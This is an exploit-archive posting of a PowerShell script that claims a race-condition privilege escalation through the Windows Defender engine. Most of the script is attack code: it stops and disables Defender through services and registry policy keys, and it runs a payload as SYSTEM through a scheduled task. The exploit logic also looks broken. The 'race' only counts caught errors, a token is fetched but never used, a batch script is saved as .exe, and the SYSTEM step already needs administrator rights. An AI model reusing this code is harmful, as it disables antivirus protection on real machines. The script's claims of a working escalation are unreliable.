Share
## https://sploitus.com/exploit?id=PACKETSTORM:223820
==================================================================================================================================
| # Title : Windows Defender MsMpEng.exe Race Condition Local Privilege
Escalation PowerShell Exploit |
| # Author : indoushka
|
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64
bits) |
| # Vendor : https://www.microsoft.com/
|
==================================================================================================================================
[+] Summary : This PowerShell script demonstrates a local privilege
escalation (LPE) attack targeting a race condition in the Windows Defender
engine (MsMpEng.exe).
[+] POC :
<#
.SYNOPSIS
.\WinDefender_LPE.ps1
.\WinDefender_LPE.ps1 -RaceIterations 200 -DisableDefender
#>
param(
[int]$RaceIterations = 100,
[switch]$DisableDefender,
[switch]$Cleanup,
[string]$PayloadPath = "$env:TEMP\payload.exe"
)
function Write-ColorOutput {
param(
[string]$Message,
[string]$Color = "White"
)
$colors = @{
"SUCCESS" = "Green"
"ERROR" = "Red"
"WARNING" = "Yellow"
"INFO" = "Cyan"
}
$colorName = if ($colors.ContainsKey($Color)) { $colors[$Color] } else
{ $Color }
Write-Host "[$(Get-Date -Format 'HH:mm:ss')] $Message" -ForegroundColor
$colorName
}
function Test-Admin {
$currentUser = [Security.Principal.WindowsIdentity]::GetCurrent()
$principal = New-Object
Security.Principal.WindowsPrincipal($currentUser)
return
$principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
}
function Get-DefenderStatus {
try {
$service = Get-Service -Name WinDefend -ErrorAction Stop
return $service.Status
} catch {
return "Not Found"
}
}
function New-FakeISO {
param([string]$Path)
Write-ColorOutput "Creating fake ISO at $Path" "INFO"
$isoContent = "CD001" * 512
$isoContent += "`0" * 1024
[System.IO.File]::WriteAllBytes($Path,
[System.Text.Encoding]::ASCII.GetBytes($isoContent))
if (Test-Path $Path) {
Write-ColorOutput "Fake ISO created successfully" "SUCCESS"
return $true
}
return $false
}
function Mount-ISO {
param([string]$IsoPath)
Write-ColorOutput "Mounting ISO $IsoPath" "INFO"
try {
$result = Mount-DiskImage -ImagePath $IsoPath -PassThru
-ErrorAction Stop
Write-ColorOutput "ISO mounted successfully" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Failed to mount ISO: $($_.Exception.Message)"
"ERROR"
return $false
}
}
function Dismount-ISO {
param([string]$IsoPath)
try {
Dismount-DiskImage -ImagePath $IsoPath -ErrorAction SilentlyContinue
Write-ColorOutput "ISO unmounted" "INFO"
} catch {
}
}
function Set-RealtimePriority {
Write-ColorOutput "Setting process to REALTIME priority class" "INFO"
try {
$process = Get-Process -Id $pid
$process.PriorityClass =
[System.Diagnostics.ProcessPriorityClass]::RealTime
Write-ColorOutput "Realtime priority set" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Failed to set realtime priority:
$($_.Exception.Message)" "WARNING"
return $false
}
}
function Invoke-RaceCondition {
param([int]$Iterations)
Write-ColorOutput "Triggering race condition with $Iterations
iterations" "INFO"
$successCount = 0
$raceTriggered = $false
for ($i = 0; $i -lt $Iterations; $i++) {
try {
$shadow = (Get-WmiObject -List Win32_ShadowCopy).Create("C:\",
"ClientAccessible")
Start-Process -FilePath "C:\Program Files\Windows
Defender\MpCmdRun.exe" -ArgumentList "-Scan -ScanType 3" -WindowStyle
Hidden -ErrorAction SilentlyContinue
$testFile = "$env:TEMP\race_$i.txt"
"test" | Out-File -FilePath $testFile -ErrorAction
SilentlyContinue
Remove-Item $testFile -ErrorAction SilentlyContinue
$successCount++
if ($i % 10 -eq 0) {
Write-ColorOutput "Race iteration $i/$Iterations completed"
"INFO"
}
} catch {
Write-ColorOutput "RACE TRIGGERED at iteration $i!" "WARNING"
$raceTriggered = $true
break
}
Start-Sleep -Milliseconds 50
}
Write-ColorOutput "Completed $successCount iterations" "INFO"
return $raceTriggered
}
function Disable-DefenderPersistence {
Write-ColorOutput "Disabling Windows Defender persistence..." "WARNING"
try {
Stop-Service -Name WinDefend -Force -ErrorAction SilentlyContinue
Set-Service -Name WinDefend -StartupType Disabled -ErrorAction
SilentlyContinue
$regPath = "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender"
New-Item -Path $regPath -Force -ErrorAction SilentlyContinue
Set-ItemProperty -Path $regPath -Name "DisableAntiSpyware" -Value 1
-Force -ErrorAction SilentlyContinue
$rtpPath = "$regPath\Real-Time Protection"
New-Item -Path $rtpPath -Force -ErrorAction SilentlyContinue
Set-ItemProperty -Path $rtpPath -Name "DisableRealtimeMonitoring"
-Value 1 -Force -ErrorAction SilentlyContinue
Write-ColorOutput "Windows Defender disabled" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Failed to disable Defender:
$($_.Exception.Message)" "ERROR"
return $false
}
}
function Restore-Defender {
Write-ColorOutput "Restoring Windows Defender..." "INFO"
try {
Remove-ItemProperty -Path
"HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name
"DisableAntiSpyware" -ErrorAction SilentlyContinue -Force
Set-Service -Name WinDefend -StartupType Automatic -ErrorAction
SilentlyContinue
Start-Service -Name WinDefend -ErrorAction SilentlyContinue
Set-MpPreference -DisableRealtimeMonitoring $false -ErrorAction
SilentlyContinue
Write-ColorOutput "Windows Defender restored" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Failed to restore Defender:
$($_.Exception.Message)" "WARNING"
return $false
}
}
function Invoke-SystemPayload {
param([string]$PayloadPath)
Write-ColorOutput "Attempting to execute payload as SYSTEM..." "INFO"
try {
# Method 1: Use winlogon token
$winlogon = Get-Process -Name winlogon -ErrorAction Stop
$token = $winlogon.Handle
$startInfo = New-Object System.Diagnostics.ProcessStartInfo
$startInfo.FileName = $PayloadPath
$startInfo.UseShellExecute = $false
$startInfo.CreateNoWindow = $true
$startInfo.WindowStyle =
[System.Diagnostics.ProcessWindowStyle]::Hidden
[System.Diagnostics.Process]::Start($startInfo) | Out-Null
Write-ColorOutput "Payload executed via winlogon" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Winlogon method failed: $($_.Exception.Message)"
"WARNING"
}
try {
$taskName = "TempTask" +
[System.IO.Path]::GetRandomFileName().Replace('.', '')
schtasks /create /tn $taskName /tr $PayloadPath /sc once /st 00:00
/ru SYSTEM /f | Out-Null
schtasks /run /tn $taskName | Out-Null
Start-Sleep -Seconds 2
schtasks /delete /tn $taskName /f | Out-Null
Write-ColorOutput "Payload executed via scheduled task" "SUCCESS"
return $true
} catch {
Write-ColorOutput "Scheduled task method failed:
$($_.Exception.Message)" "WARNING"
}
Write-ColorOutput "Failed to execute payload as SYSTEM" "ERROR"
return $false
}
function New-TestPayload {
param([string]$Path)
Write-ColorOutput "Creating test payload at $Path" "INFO"
$payload = @'
@echo off
echo [+] Exploit successful! Running as: > %temp%\defender_lpe.txt
whoami >> %temp%\defender_lpe.txt
echo [+] Date: %date% %time% >> %temp%\defender_lpe.txt
calc.exe
'@
[System.IO.File]::WriteAllText($Path, $payload)
return $true
}
function Main {
Write-ColorOutput @"
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ Windows Defender MsMpEng.exe Race Condition LPE โ
โ Local Privilege Escalation to SYSTEM โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
"@ "INFO"
Write-ColorOutput "Target: $env:COMPUTERNAME" "INFO"
Write-ColorOutput "User: $env:USERNAME" "INFO"
if (-not (Test-Admin)) {
Write-ColorOutput "Not running as administrator. Exploit may fail."
"WARNING"
}
$defenderStatus = Get-DefenderStatus
Write-ColorOutput "Windows Defender status: $defenderStatus" "INFO"
if ($defenderStatus -ne "Running") {
Write-ColorOutput "Windows Defender is not running. Exploit may not
work." "ERROR"
return
}
Set-RealtimePriority
$isoPath = "$env:TEMP\fake_$(Get-Random).iso"
if (-not (New-FakeISO -Path $isoPath)) {
Write-ColorOutput "Failed to create fake ISO" "ERROR"
return
}
$mountSuccess = Mount-ISO -IsoPath $isoPath
$raceTriggered = Invoke-RaceCondition -Iterations $RaceIterations
Dismount-ISO -IsoPath $isoPath
Remove-Item $isoPath -Force -ErrorAction SilentlyContinue
$newDefenderStatus = Get-DefenderStatus
if ($newDefenderStatus -ne $defenderStatus) {
Write-ColorOutput "Windows Defender status changed: $defenderStatus
-> $newDefenderStatus" "WARNING"
}
$payloadPath = if ($PayloadPath -and (Test-Path $PayloadPath)) {
$PayloadPath
} else {
$tempPayload = "$env:TEMP\payload_$(Get-Random).exe"
New-TestPayload -Path $tempPayload
$tempPayload
}
if ($raceTriggered) {
Write-ColorOutput "Race condition triggered successfully!" "SUCCESS"
Invoke-SystemPayload -PayloadPath $payloadPath
} else {
Write-ColorOutput "Race condition may not have triggered" "WARNING"
}
if ($DisableDefender) {
Disable-DefenderPersistence
}
if ($Cleanup) {
Restore-Defender
}
Write-ColorOutput "Exploit completed" "INFO"
}
Main
Greetings to
:==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John
Page aka hyp3rlinx)|
============================================================================================